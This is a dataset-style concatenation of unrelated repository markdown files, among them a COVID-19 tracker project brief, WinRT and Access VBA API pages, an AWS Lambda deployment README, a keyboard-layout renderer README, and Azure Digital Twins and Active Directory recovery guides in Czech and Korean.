- [ ] User can see information about COVID-19 wordwide (infected, recovered, dead).
- [ ] User can see information about COVID-19 in a specific country (infected, recovered, dead).
## Bonus features
- [ ] If available, display regional data within a country.
- [ ] Use a map, charts or any other visualization to display information.
## Useful links and resources
- [API 1](https://github.com/mathdroid/covid-19-api)
- [API 2](https://covid2019-api.herokuapp.com/)
## Example projects
- [Example 1](https://www.youtube.com/watch?v=B85s0cjlitE)
- [Example 2](https://www.coronatracker.com/)
- [Example 3](https://www.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40299423467b48e9ecf6)
## Submissions
- [@CoreChallenge](https://weekly-project-corvid.netlify.com/)
- [@Ameen](https://covid-19-tracker-nine.vercel.app/)
- [@ivanms1](https://covid-tracker-ten.now.sh/)
- [@satsuroki](https://covid-19.guineeapps.com/index.html)
- [@angels7](https://covid19track.netlify.com/)
- [@Rakshit](https://covidtracker-raj.netlify.com/)
- [@revengemiroz](https://sad-poincare-02054d.netlify.com/?fbclid=IwAR0fUuhR4UM3AWu7Lrl5ZH7WljX63X0_3FQ3xkE5DnnEwnlXsEux2AqGRrA)
- [@mbalaji5](http://covid19tracker.atwebpages.com/)
- [@rishabkumar7](https://covid-19.rishabkumar.ga/)
- [@ved08](https://ved08.github.io/COVID-19-info)
- [@santos25](https://santos25.github.io/coronavirustracker)
- [@rishipurwar1](https://covid-2019tracker.netlify.app/)
- [@SanjanaMukherjee](https://sanjana-mukherjee.github.io/Covid19-Tracker/)
- [@SomShekhar](https://covid19-virus-stats.netlify.app/)
- [@gueguet](https://laughing-shannon-23486b.netlify.app/)
- [@Steffan153](https://coronavirus-tracker.surge.sh/)
- [@OscarRavelo](https://oscarravelo.github.io/CovidTracker/)
| 44.0625 | 134 | 0.739953 | yue_Hant | 0.416939 |
e04d68a9f0e0e8396d5620d7a9b776e5f2314ce6 | 629 | md | Markdown | windows.ui.xaml.media/gradientstop_offset.md | angelazhangmsft/winrt-api | 1f92027f2462911960d6be9333b7a86f7b9bf457 | [
"CC-BY-4.0",
"MIT"
] | 199 | 2017-02-09T23:13:51.000Z | 2022-03-28T15:56:12.000Z | windows.ui.xaml.media/gradientstop_offset.md | angelazhangmsft/winrt-api | 1f92027f2462911960d6be9333b7a86f7b9bf457 | [
"CC-BY-4.0",
"MIT"
] | 2,093 | 2017-02-09T21:52:45.000Z | 2022-03-25T22:23:18.000Z | windows.ui.xaml.media/gradientstop_offset.md | angelazhangmsft/winrt-api | 1f92027f2462911960d6be9333b7a86f7b9bf457 | [
"CC-BY-4.0",
"MIT"
] | 620 | 2017-02-08T19:19:44.000Z | 2022-03-29T11:38:25.000Z | ---
-api-id: P:Windows.UI.Xaml.Media.GradientStop.Offset
-api-type: winrt property
---
<!-- Property syntax
public double Offset { get; set; }
-->
# Windows.UI.Xaml.Media.GradientStop.Offset
## -description
Gets the location of the gradient stop within the gradient vector.
Equivalent WinUI property: [Microsoft.UI.Xaml.Media.GradientStop.Offset](/windows/winui/api/microsoft.ui.xaml.media.gradientstop.offset).
## -xaml-syntax
```xaml
<GradientStop Offset="double"/>
```
## -property-value
The relative location of this gradient stop along the gradient vector. The default is 0.
## -remarks
## -examples
## -see-also
| 20.290323 | 137 | 0.732909 | eng_Latn | 0.681797 |
e04d9517afef1d87737f6e7c28df26cc58c0f829 | 47 | md | Markdown | Published/ItemCostCalculator/README.md | Ailtop/uModPlugins | 2b3b0ade8c6181b8034b1eff45ddd3170ec8688f | [
"MIT"
] | null | null | null | Published/ItemCostCalculator/README.md | Ailtop/uModPlugins | 2b3b0ade8c6181b8034b1eff45ddd3170ec8688f | [
"MIT"
] | null | null | null | Published/ItemCostCalculator/README.md | Ailtop/uModPlugins | 2b3b0ade8c6181b8034b1eff45ddd3170ec8688f | [
"MIT"
] | null | null | null | # ItemCostCalculator
[中文文档](./README.zh-CN.md) | 15.666667 | 25 | 0.723404 | yue_Hant | 0.968018 |
e04dc609b5525a593070162405d8e3378208106f | 2,312 | md | Markdown | aws/lambda/README.md | openregister/deployment | 13a442c503288eedbdcd54590ddac8360904f5aa | [
"MIT"
] | 5 | 2015-08-21T15:27:27.000Z | 2019-05-07T10:05:41.000Z | aws/lambda/README.md | openregister/deployment | 13a442c503288eedbdcd54590ddac8360904f5aa | [
"MIT"
] | 142 | 2015-08-05T09:06:23.000Z | 2020-01-23T16:40:11.000Z | aws/lambda/README.md | openregister/deployment | 13a442c503288eedbdcd54590ddac8360904f5aa | [
"MIT"
] | 4 | 2015-08-21T15:29:59.000Z | 2021-04-11T08:25:53.000Z | # Terraform configuration for Registers Lambdas
## Prerequisites
* [Node.js](https://nodejs.org/) v8.1.0 (note if you have a different Node version, you can use [nvm](https://github.com/creationix/nvm) to use this version for this directory)
* [Terraform](https://www.terraform.io/). You should install Terraform using the method described [here](https://github.com/openregister/deployment/blob/master/README.md#prerequisites)
* `gsed` you can install this via Homebrew: `brew install gnu-sed`
* `python3` you can install this via Homebrew: `brew install python3`
* `virtualenv` you can install this via pip3: `pip3 install virtualenv`
## Using
Run a plan:
```
make plan
```
Review and apply changes:
```
make apply
```
If you updated the Lambda@Edge functions (`cloudfront-post-logger` or `log-api-key-to-cloudwatch`) you must apply the Registers Terraform to associate the new Lambda versions with the Registers CloudFront distributions. Perform [Update terraform config (steps 6 - 8)](../../README.md#6-update-terraform-config)
## Running Lambdas Locally
### Setup
Install [aws-sam-cli](https://github.com/awslabs/aws-sam-cli) in a virtual environment:
```
python3 -m venv .venv/
source .venv/bin/activate
pip install -r requirements.txt
```
The lambdas are defined in `template.yml` files in the `node` and `python` subdirectories.
### Node lambdas
Run these commands from the `deployment/aws/lambda/node` directory.
Cloudfront POST request logger:
```
sam local invoke "CloudfrontPostLoggerFunction" --event ./cloudfront-post-logger/example_request.json
```
Cache invalidator:
```
sam local invoke "CacheInvalidatorFunction" --event ./cache-invalidator/example_event.json
```
API key request logger:
```
sam local invoke CloudfrontLogAPIKeyFunction -e log-api-key-to-cloudwatch/example.json
```
Send API key to Google Analytics:
```
sam local invoke CloudfrontLogsApiKeyToGoogleAnalyticsFunction -e cloudfront-logs-api-key-to-google-analytics/examples/logs-no-key.json
```
### Python lambdas
Run these commands from the `deployment/aws/lambda/python` directory:
Request log anonymiser:
```
TARGET_BUCKET=target-bucket-name sam local invoke LogAnonymiser -e log-anonymiser/put-bucket-event.json
```
Note that the bucket to read from is defined by the event json, so edit as appropriate.
| 32.111111 | 311 | 0.763408 | eng_Latn | 0.753329 |
e04e2843de5dd882f92faabef857c05f5d424e57 | 4,262 | md | Markdown | README.md | Rr01010010/Unity-Building-Creation-Editor | 9539010e49b461089f3d09142a8074d815810da4 | [
"MIT"
] | null | null | null | README.md | Rr01010010/Unity-Building-Creation-Editor | 9539010e49b461089f3d09142a8074d815810da4 | [
"MIT"
] | null | null | null | README.md | Rr01010010/Unity-Building-Creation-Editor | 9539010e49b461089f3d09142a8074d815810da4 | [
"MIT"
] | null | null | null | # Unity-Building-Creation-Editor
## О проекте
Небольшой плагин, позволяющий легко и быстро создавать здания, комнаты на вашем уровне.
Инструмент особенно полезен при прототипировании уровня так как, позволяет "накидать" уровень и быстро его опробовать.
***
## Требования
Необходима библиотека **Json.NET - Newtonsoft** либо из [Unity Asset Store](https://assetstore.unity.com/packages/tools/input-management/json-net-for-unity-11347), либо из [nuget.org](https://www.nuget.org/packages/Newtonsoft.Json/12.0.2), только в последнем случае вам надо выбрать версию пакета, и нажать в меню справа _Download package_, после чего распаковать архиватором newtonsoft.json.nupkg файл, и в папке найти нужную вам dll.
После этого библиотеку **Json.NET - Newtonsoft** и плагин **Unity-Building-Creation-Editor** необходимо скинуть в проект Unity (желательно библиотеку скинуть в папку плагина ThirdParty, а после этого ThirdParty скинуть в папку вашего проекта). Тогда Unity все слинкует. И всё должно заработать
***
## Использование
[**Видео туториал с таймкодом**](https://youtu.be/I-GhEakibtU?t=502).
Работа в редакторе происходит в **3 этапа: 1.Node Creator, 2.Wall Creator, 3.Room Creator**, на трёх сценах с соответсвующими названиями. На каждой сцене **управляющий скрипт прикреплён к камере**, с помощью скрипта вы можете управлять настройками редактора, загружать и сохранять данные. Внутри каждого скрипта указан путь к папке с Json-ами, и название уровня в поле LevelName, меняя имя этого поля, вы можете создавать новые уровни или переключатся, на уже созданные.
**1.Node Creator**
Для того чтобы быстро создать ноды, перейдите в сцену **1.Node Creator** и **запустите её в режиме playmode**, с помощью зеленной коробки вы можете расставлять ноды, по нажатию левой кнопки мыши. И удалять ноды, при повторном нажатии. Камера автоматически преследует коробку. При помощи колесика мыши, вы можете менять масштаб. А меняя поле HeightOfNewPoint, вы меняете высоту устанавливоемой ноды. С помощью полей Sensetive X/Y, вы можете настроить чувствительность мыши для передвижения коробки. При помощи поля CellSize вы можете настроить ширину ячейки, а при помощи GridSize, установить ширину отрисованного поля. (Однако вы, также можете устанавливать узлы, вне этого поля).
*Сохранение узлов*
По окончанию работы сохраните узлы с помощью кнопки _Create Points_ на игровом объекте Main Camera, загрузить ноды для редактирования вы можете по кнопке _Download Nodes_.
**2.Wall Creator**
Чтобы связать ноды образуя стены, перейдите в сцену **2.Wall Creator**, с помощью кнопки _Download Nodes_ на игровом объекте Main Camera вы построите ноды как игровые объекты, сохраненные в прошлой сцене. Нажимая на кнопку _Linking Request_ в нодах вы можете связывать и развязывать ноды, образуя их в форме нужного вам здания. **Однако запустив сцену в playmode** вы можете связывать и развязывать ноды быстрее. Для этого, с аналогичным управляением в сцене образом в этой сцене _1.Node Creator_ вы можете управлять коробкой. Нажимая левую кнопку мыши вы можете, выделить два узла, и образовать между ними связь, при повторном выделении уже соедененных узлов, связь удаляется. **При нажатии на правую кнопку мыши**, на месте прицела - коробки, появится новая нода. (Если перейти во вкладку сцены, не выключая Playmode, вы можете перемещать ноды, как обычные GameObjects).
Так постепенно связывая нужные вам ноды, выстроется силует будующего здания.
После окончания работы нажмите на кнопки
<li> "Save ListNodes" в камере, чтобы сохранить связи,
<li> "Download ListNodes" в камере, чтобы загрузить и отредактировать форму здания,
**3.Room Creator**
Чтобы установить стены, на место связей, перейдите в сцену **3.Room Creator**, с помощью кнопки _Download ListNodes_, на игровом объекте Main Camera, вы загрузите связи. Далее в камере, вы можете настроить параметры будующих стен и загрузить Prefab стены. Настроив параметры стен, нажмите кнопку _Build Rooms_, если все было сделано правильно, то у вас появится Container с сгенерированными стенами. Далее рекомендуется удалить дубликаты стен (у каждой стены на самом деле внутри 2 стены). После чего вы можете сохранить сцену как новый уровень, или сохранить стены как префаб перетащив контейнер в Project Manager, в папку Assets.
| 142.066667 | 872 | 0.802675 | rus_Cyrl | 0.985202 |
e04e39bdf20375712c19413c4696e44337b1935b | 313 | md | Markdown | README.md | jinyanshenxing/zhuye | 967c7577dd674b6fc2f448e899d8cf28b1d9ab25 | [
"MIT"
] | null | null | null | README.md | jinyanshenxing/zhuye | 967c7577dd674b6fc2f448e899d8cf28b1d9ab25 | [
"MIT"
] | null | null | null | README.md | jinyanshenxing/zhuye | 967c7577dd674b6fc2f448e899d8cf28b1d9ab25 | [
"MIT"
] | null | null | null | # zhuye
[](https://github.com/jinyanshenxing/zhuye/actions/workflows/generate.yml)
jinyanshenxing's navigation site, generated by [gena](https://github.com/x1ah/gena)
Site address: https://jinyanshenxing.github.io/zhuye/ | 44.714286 | 164 | 0.789137 | yue_Hant | 0.33631 |
e04eaf4cf7c571f2fb8f5732cecfbfdce7e29ffb | 546 | md | Markdown | README.md | ConnectionMaster/.github-6 | 1b4b4c65084d5153251bd1e84dbf6ce29ce115b9 | [
"MIT"
] | 5 | 2019-07-20T06:18:18.000Z | 2022-03-13T12:02:23.000Z | README.md | alaizzi99/.github | 1b4b4c65084d5153251bd1e84dbf6ce29ce115b9 | [
"MIT"
] | 1 | 2022-02-10T12:36:04.000Z | 2022-02-10T12:36:04.000Z | README.md | alaizzi99/.github | 1b4b4c65084d5153251bd1e84dbf6ce29ce115b9 | [
"MIT"
] | 9 | 2019-07-14T22:15:51.000Z | 2021-11-07T18:00:26.000Z | # .github
These are the [default community health files](https://help.github.com/en/articles/creating-a-default-community-health-file-for-your-organization) for the Azure organization on GitHub.
# Contributing
Microsoft projects adopt the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [[email protected]](mailto:[email protected]) with any additional questions or comments.
| 68.25 | 332 | 0.805861 | eng_Latn | 0.837332 |
e04f601b6ca0677161f6f8bc38eaf74bfbec050f | 6,135 | md | Markdown | README.md | CQCumbers/kle_render | 930f2079e332c9e6fe9e927b61d1e29a9a171026 | [
"MIT"
] | 120 | 2017-05-23T18:07:04.000Z | 2022-02-25T00:45:41.000Z | README.md | CQCumbers/kle_render | 930f2079e332c9e6fe9e927b61d1e29a9a171026 | [
"MIT"
] | 23 | 2017-10-26T01:06:15.000Z | 2022-03-12T00:59:07.000Z | README.md | CQCumbers/kle_render | 930f2079e332c9e6fe9e927b61d1e29a9a171026 | [
"MIT"
] | 20 | 2017-06-07T12:30:00.000Z | 2022-03-09T20:02:54.000Z | # KLE-Render
> Get prettier images of Keyboard Layout Editor designs
This project uses Python, Pillow, and Flask to serve up more realistic visualizations of custom mechanical keyboard layouts. It works by stretching, tinting, and tiling base images of a 1u keycap. Check it out at [kle-render.herokuapp.com](http://kle-render.herokuapp.com/). You can also see a [sample render](#sample-image) of Nantucket Selectric below.
## Frequently Asked Questions
### What layouts are supported?
KLE-Render should support any layout created with keyboard-layout-editor though some may not render exactly as expected. Specifically, certain very uncommon unicode glyphs may not be displayed. Custom legend images take up the full width of the keycap and only one per key can be used. The base images are only of SA and GMK keycaps, but most layouts in DSA, DCS, OEM, or even beamspring profiles should still look pretty close. Sculpted row profiles are not supported; everything is assumed to be uniform row 3.
### How do I include icons and novelties in my layout?
Many common icons and symbols are part of [Unicode](https://unicode-table.com), and can be rendered simply by pasting the appropriate character into the legend text boxes in keyboard-layout-editor. To match the default GMK icons, you can copy characters from the [GMK Icons Template](http://www.keyboard-layout-editor.com/#/gists/afc75b1f6ebee743ff0e2f589b0fc68d). Less common icons are available as part of the Font Awesome or Keyboard-Layout-Editor icon sets under the Character Picker dropdown.
For truly custom legends though, you'll have to use an html image tag, like this one `<img src='http://i.imgur.com/QtgaNKa.png' width='30'>`. The src parameter here should point to a PNG image with your legend on a transparent background. Note that KLE-Render does not support combining these custom legend images with regular text on the same key, and ignores any sizing or position info - the image is always resized to cover the entire top of the keycap. For reference see the SA and GMK kitting templates below.
### Are custom fonts supported?
There is limited support for custom fonts, but this should be considered an advanced feature. Most layouts won't work without some changes to the custom styling. For more details on how and why see [issue #7](https://github.com/CQCumbers/kle_render/issues/7#issuecomment-880827473).
### What do I do if I get an error page when trying to render?
If you get an internal server error when attempting to render a layout, first make sure that your JSON input is downloaded properly or that your gist url actually exists. If the error persists, please contact me with the gist link or JSON that is causing the problem and I may be able to fix it. I am CQ\_Cumbers on reddit and geekhack.
### Why don't my renders look like the ones on Massdrop?
This tool can generate more realistic renders of arbitrary keyboard layouts, but because it works by stretching and tinting grayscale images, there are many limitations on realism as compared to actual 3D renders. If you're looking for fast and photorealistic visualizations [kbrenders.com](http://www.kbrenders.com) can be a useful resource. For certain custom work, however, you may still have to do post-processing in photoshop or commission a professional like thesiscamper to work with you.
### How do I turn my set design into a group buy?
If you're looking to create a keycap set for a group buy livingspeedbump (creator of SA Jukebox) has a nice [guide](https://www.keychatter.com/2015/10/10/how-to-create-a-keycap-set-for-a-group-buy/) up on keychatter.
## Templates
The following templates have their legend sizes and keycap profiles pre-configured for accurate rendering. Use them as a starting point for your own designs!
- Example Kitting - [SA](http://www.keyboard-layout-editor.com/#/gists/6331e126fa6340711e53a0806d57cde5)/[GMK](http://www.keyboard-layout-editor.com/#/gists/a3a9791b1068f1100b151c33debf660f)
- Mech Mini 2 (40%) - [SA](http://www.keyboard-layout-editor.com/#/gists/ea2a231112ffceae047494ac9a93e706)/[GMK](http://www.keyboard-layout-editor.com/#/gists/eed1f1854dda3999bcdd730f0143c627)
- Klippe (60%) - [SA](http://www.keyboard-layout-editor.com/#/gists/f8369e8d6ae12c6d30bbf6db9731bca5)/[GMK](http://www.keyboard-layout-editor.com/#/gists/c2aedbf20e6a1ee5320a0f89b114d6da)
- J-02 (HHKB) - [SA](http://www.keyboard-layout-editor.com/#/gists/1e01f5c46bcc3ba388f84d3a26f2e2eb)/[GMK](http://www.keyboard-layout-editor.com/#/gists/d5ef16b69b4ea15569d7a319bbf90a8e)
- RAMA M65 (65%) - [SA](http://www.keyboard-layout-editor.com/#/gists/3ca3649e1d048134ddd0e835d1dd735b)/[GMK](http://www.keyboard-layout-editor.com/#/gists/4319599274157d2a0dd0e38328b76878)
- GMMK Pro (75%) - [SA](http://www.keyboard-layout-editor.com/#/gists/c1a1d76bfcd236bc36e1c04c1e86a0d8)/[GMK](http://www.keyboard-layout-editor.com/#/gists/8ab0de3dd5dc804ecb052924a1c45be5)
- JP01 (Arisu) - [SA](http://www.keyboard-layout-editor.com/#/gists/4f06c7adcce33046a463084af34aae60)/[GMK](http://www.keyboard-layout-editor.com/#/gists/de533ff9b29225bb65a6155151030673)
- Mech27 (TKL) - [SA](http://www.keyboard-layout-editor.com/#/gists/10629d008a99d8d6eb6f8c59414b5dd8)/[GMK](http://www.keyboard-layout-editor.com/#/gists/6e6692825b348f40c040ca9750e469a8)
- Espectro (96%) - [SA](http://www.keyboard-layout-editor.com/#/gists/6b996bea3ebf8a85866ddea606e25de4)/[GMK](http://www.keyboard-layout-editor.com/#/gists/6a03012a82e7bbca14db635142913a7)
- Cypher (1800-like) - [SA](http://www.keyboard-layout-editor.com/#/gists/9b5535a779ae9f095da3b8a73a39a3cf)/[GMK](http://www.keyboard-layout-editor.com/#/gists/27bc8c126110952cc77c69ef972a7d0d)
- Triangle (Full-size) - [SA](http://www.keyboard-layout-editor.com/#/gists/b86a688e6502fcc910d4b32ca2fa642e)/[GMK](http://www.keyboard-layout-editor.com/#/gists/11f7fc1a19c7f2210f560a93c8ab82a2)
- Modifier Icons - [GMK](http://www.keyboard-layout-editor.com/#/gists/afc75b1f6ebee743ff0e2f589b0fc68d)
## Sample Image
Nantucket Selectric ([JSON](http://www.keyboard-layout-editor.com/#/gists/4de8adb88cb4c45c2f43))

| 127.8125 | 515 | 0.788264 | eng_Latn | 0.925964 |
e0500124e0c0d088ad585ed1d58d782bc83ce66b | 2,028 | md | Markdown | WindowsServerDocs/identity/ad-ds/manage/AD-Forest-Recovery-Guide.md | hsebs/windowsserverdocs.ko-kr | 5df4d1fdc437c37e2c89d3c188db7354df97dd4b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/identity/ad-ds/manage/AD-Forest-Recovery-Guide.md | hsebs/windowsserverdocs.ko-kr | 5df4d1fdc437c37e2c89d3c188db7354df97dd4b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/identity/ad-ds/manage/AD-Forest-Recovery-Guide.md | hsebs/windowsserverdocs.ko-kr | 5df4d1fdc437c37e2c89d3c188db7354df97dd4b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
ms.assetid: 680e05ac-f9be-4b07-a9f4-cd6da5835952
title: Active Directory 포리스트 복구 가이드
description: 이 가이드에서는 백업, 복원 및 active directory 재해 복구에 대 한 지침을 제공 합니다.
ms.author: joflore
author: MicrosoftGuyJFlo
manager: mtillman
ms.date: 08/09/2018
ms.topic: article
ms.prod: windows-server
ms.technology: identity-adds
ms.openlocfilehash: ee31076669351a92caf79c6b8972ccdd68b347aa
ms.sourcegitcommit: 6aff3d88ff22ea141a6ea6572a5ad8dd6321f199
ms.translationtype: MT
ms.contentlocale: ko-KR
ms.lasthandoff: 09/27/2019
ms.locfileid: "71390443"
---
# <a name="active-directory-forest-recovery-guide"></a>Active Directory 포리스트 복구 가이드
>적용 대상: Windows Server 2016, Windows Server 2012 및 2012 R2, Windows Server 2008 및 2008 R2, Windows Server 2003
이 가이드에는 포리스트 전체 오류로 인해 포리스트의 모든 Dc (도메인 컨트롤러)가 정상적으로 작동 하지 않을 경우 Active Directory® 포리스트를 복구 하기 위한 모범 사례 권장 사항이 포함 되어 있습니다. 포함 된 단계는 특정 환경에 맞게 사용자 지정할 수 있는 포리스트 복구 계획의 템플릿으로 사용 됩니다. 이러한 단계는 Microsoft® Windows Server 2016, 2012 R2, 2012, 2008 R2, 2008 및 2003 운영 체제를 실행 하는 Dc에 적용 됩니다.
> [!NOTE]
> Windows Server 2003를 실행 하는 Dc에 고유한 절차는 [AD 포리스트 복구 Windows server 2003](AD-Forest-Recovery-Windows-Server-2003.md)에 통합 되어 있습니다.
## <a name="steps-outlined-in-this-guide"></a>이 가이드에 설명 된 단계
- [AD 포리스트 복구 - 필수 조건](AD-Forest-Recovery-Prerequisties.md)
- [AD 포리스트 복구-사용자 지정 포리스트 복구 계획 고안](AD-Forest-Recovery-Devising-a-Plan.md)
- [AD 포리스트 복구 - 복구 단계](AD-Forest-Recovery-Steps-For-Restoring.md)
- [AD 포리스트 복구-문제 식별](AD-Forest-Recovery-Identify-the-Problem.md)
- [AD 포리스트 복구-복구 방법을 결정 합니다.](AD-Forest-Recovery-Determine-how-to-Recover.md)
- [AD 포리스트 복구-초기 복구 수행](AD-Forest-Recovery-Perform-initial-recovery.md)
- [AD 포리스트 복구 - 절차](AD-Forest-Recovery-Procedures.md)
- [AD 포리스트 복구-질문과 대답](AD-Forest-Recovery-FAQ.md)
- [AD 포리스트 복구-다중 도메인 포리스트 내에서 단일 도메인 복구](AD-Forest-Recovery-Single-Domain-in-Multidomain-Recovery.md)
- [AD 포리스트 복구 - 가상화](AD-Forest-Recovery-Virtualization.md)
- [AD 포리스트 복구-Windows Server 2003 도메인 컨트롤러를 사용 하 여 포리스트 복구](AD-Forest-Recovery-Windows-Server-2003.md)
| 49.463415 | 283 | 0.745069 | kor_Hang | 0.999893 |
e050af92e0b8922e2cf83d92834d02bccd424b95 | 1,698 | md | Markdown | api/Access.Form.CommandBeforeExecute(even).md | seydel1847/VBA-Docs | b310fa3c5e50e323c1df4215515605ae8da0c888 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | api/Access.Form.CommandBeforeExecute(even).md | seydel1847/VBA-Docs | b310fa3c5e50e323c1df4215515605ae8da0c888 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | api/Access.Form.CommandBeforeExecute(even).md | seydel1847/VBA-Docs | b310fa3c5e50e323c1df4215515605ae8da0c888 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Form.CommandBeforeExecute event (Access)
keywords: vbaac10.chm13673
f1_keywords:
- vbaac10.chm13673
ms.prod: access
api_name:
- Access.Form.CommandBeforeExecute
ms.assetid: 4fb1c072-3781-8a52-bc9a-2e26d2738789
ms.date: 06/08/2017
localization_priority: Normal
---
# Form.CommandBeforeExecute event (Access)
Occurs before a specified command is executed. Use this event when you want to impose certain restrictions before a particular command is executed.
## Syntax
_expression_. `CommandBeforeExecute`( ` _Command_`, ` _Cancel_` )
_expression_ A variable that represents a [Form](Access.Form.md) object.
## Parameters
|Name|Required/Optional|Data type|Description|
|:-----|:-----|:-----|:-----|
| _Command_|Required|**Variant**| The command that is going to be executed.|
| _Cancel_|Required|**Object**| Set the **Value** property of this object to **True** to cancel the command.|
## Return value
nothing
## Remarks
The **OCCommandId**, **ChartCommandIdEnum**, and **PivotCommandId** constants contain lists of the supported commands for each of the Microsoft Office Web Components.
## Example
The following example demonstrates the syntax for a subroutine that traps the **CommandBeforeExecute** event.
```vb
Private Sub Form_CommandBeforeExecute( _
ByVal Command As Variant, ByVal Cancel As Object)
Dim intResponse As Integer
Dim strPrompt As String
strPrompt = "Cancel the command?"
intResponse = MsgBox(strPrompt, vbYesNo)
If intResponse = vbYes Then
Cancel.Value = True
Else
Cancel.Value = False
End If
End Sub
```
## See also
[Form Object](Access.Form.md)
[!include[Support and feedback](~/includes/feedback-boilerplate.md)] | 22.64 | 167 | 0.742049 | eng_Latn | 0.874859 |
e051bf77bacf81c961150ab16f2ac204410a5f64 | 11,152 | md | Markdown | articles/digital-twins/how-to-ingest-iot-hub-data.md | Microsoft/azure-docs.cs-cz | 1e2621851bc583267d783b184f52dc4b853a058c | [
"CC-BY-4.0",
"MIT"
] | 6 | 2017-08-28T07:43:21.000Z | 2022-01-04T10:32:24.000Z | articles/digital-twins/how-to-ingest-iot-hub-data.md | MicrosoftDocs/azure-docs.cs-cz | 1e2621851bc583267d783b184f52dc4b853a058c | [
"CC-BY-4.0",
"MIT"
] | 428 | 2018-08-23T21:35:37.000Z | 2021-03-03T10:46:43.000Z | articles/digital-twins/how-to-ingest-iot-hub-data.md | Microsoft/azure-docs.cs-cz | 1e2621851bc583267d783b184f52dc4b853a058c | [
"CC-BY-4.0",
"MIT"
] | 16 | 2018-03-03T16:52:06.000Z | 2021-12-22T09:52:44.000Z | ---
title: Ingestování telemetrie z IoT Hubu
titleSuffix: Azure Digital Twins
description: Podívejte se, jak ingestovat zprávy telemetrie zařízení z IoT Hub.
author: alexkarcher-msft
ms.author: alkarche
ms.date: 9/15/2020
ms.topic: how-to
ms.service: digital-twins
ms.openlocfilehash: a5e00ef81afc709a9072eedbb07983057f57eb08
ms.sourcegitcommit: b4fbb7a6a0aa93656e8dd29979786069eca567dc
ms.translationtype: MT
ms.contentlocale: cs-CZ
ms.lasthandoff: 04/13/2021
ms.locfileid: "107304290"
---
# <a name="ingest-iot-hub-telemetry-into-azure-digital-twins"></a>Ingestování IoT Hub telemetrie do digitálních vláken Azure
Digitální vlákna Azure se řídí daty ze zařízení IoT a dalších zdrojů. Běžný zdroj dat zařízení, která se mají používat v rámci digitálních vláken Azure, je [IoT Hub](../iot-hub/about-iot-hub.md).
Proces pro ingestování dat do digitálních vláken Azure je nastavení externího výpočetního prostředku, jako je například funkce, kterou provedete pomocí [Azure Functions](../azure-functions/functions-overview.md). Funkce přijme data a pomocí [rozhraní DigitalTwins API](/rest/api/digital-twins/dataplane/twins) nastaví vlastnosti nebo události telemetrie pro [digitální vlákna](concepts-twins-graph.md) .
Tento postup popisuje, jak dokumentovat pomocí procesu vytváření funkce, která může ingestovat telemetrie z IoT Hub.
## <a name="prerequisites"></a>Požadavky
Než budete pokračovat v tomto příkladu, budete muset nastavit následující prostředky jako požadavky:
* **Centrum IoT**. Pokyny najdete v části *vytvoření IoT Hub* [tohoto IoT Hub rychlé](../iot-hub/quickstart-send-telemetry-cli.md)spuštění.
* **Instance digitálního vlákna Azure** , která bude přijímat telemetrii zařízení. Pokyny najdete v tématu [*Postup: nastavení instance a ověřování digitálních vláken Azure*](./how-to-set-up-instance-portal.md).
### <a name="example-telemetry-scenario"></a>Ukázkový scénář telemetrie
Tento postup popisuje, jak odesílat zprávy z IoT Hub do digitálních vláken Azure pomocí funkce v Azure. K dispozici je celá řada možných konfigurací a vyhovujících strategií, které můžete použít pro posílání zpráv, ale příklad tohoto článku obsahuje následující části:
* Termostat zařízení v IoT Hub se známým ID zařízení
* Digitální vlákna představující zařízení s ID odpovídajícího
> [!NOTE]
> V tomto příkladu se používá jednoznačné ID mezi ID zařízení a odpovídajícím ID digitálního vlákna, ale je možné poskytnout propracovanější mapování ze zařízení na jeho dvojitou hodnotu (například s tabulkou mapování).
Pokaždé, když je událost telemetrie teploty odeslána zařízením termostatu, funkce zpracuje telemetrii a vlastnost *teploty* digitálního vlákna by měla aktualizovat. Tento scénář je popsaný v diagramu níže:
:::image type="content" source="media/how-to-ingest-iot-hub-data/events.png" alt-text="Diagram IoT Hub zařízení odesílá telemetrie teplot prostřednictvím IoT Hub do funkce v Azure, která aktualizuje vlastnost teploty v případě, že je v rámci služby Azure Digital v Azure." border="false":::
## <a name="add-a-model-and-twin"></a>Přidání modelu a digitálního dvojčete
V této části nastavíte [digitální dvojitou](concepts-twins-graph.md) hodnotu v digitálních proobjektech Azure, které budou představovat termostatické zařízení a budou se aktualizovat informacemi z IoT Hub.
Pro vytvoření vlákna typu termostatu budete muset nejprve nahrát termostatový [model](concepts-models.md) do instance, která popisuje vlastnosti termostatu a později se použije k vytvoření vlákna.
[!INCLUDE [digital-twins-thermostat-model-upload.md](../../includes/digital-twins-thermostat-model-upload.md)]
Pak budete muset **vytvořit jeden z těchto vláken pomocí tohoto modelu**. Pomocí následujícího příkazu vytvořte termostat s názvem **thermostat67** a nastavte 0,0 jako počáteční hodnotu teploty.
```azurecli-interactive
az dt twin create --dtmi "dtmi:contosocom:DigitalTwins:Thermostat;1" --twin-id thermostat67 --properties '{"Temperature": 0.0,}' --dt-name {digital_twins_instance_name}
```
> [!Note]
> Pokud používáte Cloud Shell v prostředí PowerShellu, může být nutné, aby se znaky uvozovek v vložených polích JSON vyhnuly jejich správné analýze. Tady je příkaz pro vytvoření vlákna s touto úpravou:
>
> Vytvořit dvojitou dvojici:
> ```azurecli-interactive
> az dt twin create --dtmi "dtmi:contosocom:DigitalTwins:Thermostat;1" --twin-id thermostat67 --properties '{\"Temperature\": 0.0,}' --dt-name {digital_twins_instance_name}
> ```
Po úspěšném vytvoření vlákna by výstup CLI z příkazu vypadal přibližně takto:
```json
{
"$dtId": "thermostat67",
"$etag": "W/\"0000000-9735-4f41-98d5-90d68e673e15\"",
"$metadata": {
"$model": "dtmi:contosocom:DigitalTwins:Thermostat;1",
"Temperature": {
"ackCode": 200,
"ackDescription": "Auto-Sync",
"ackVersion": 1,
"desiredValue": 0.0,
"desiredVersion": 1
}
},
"Temperature": 0.0
}
```
## <a name="create-a-function"></a>Vytvoření funkce
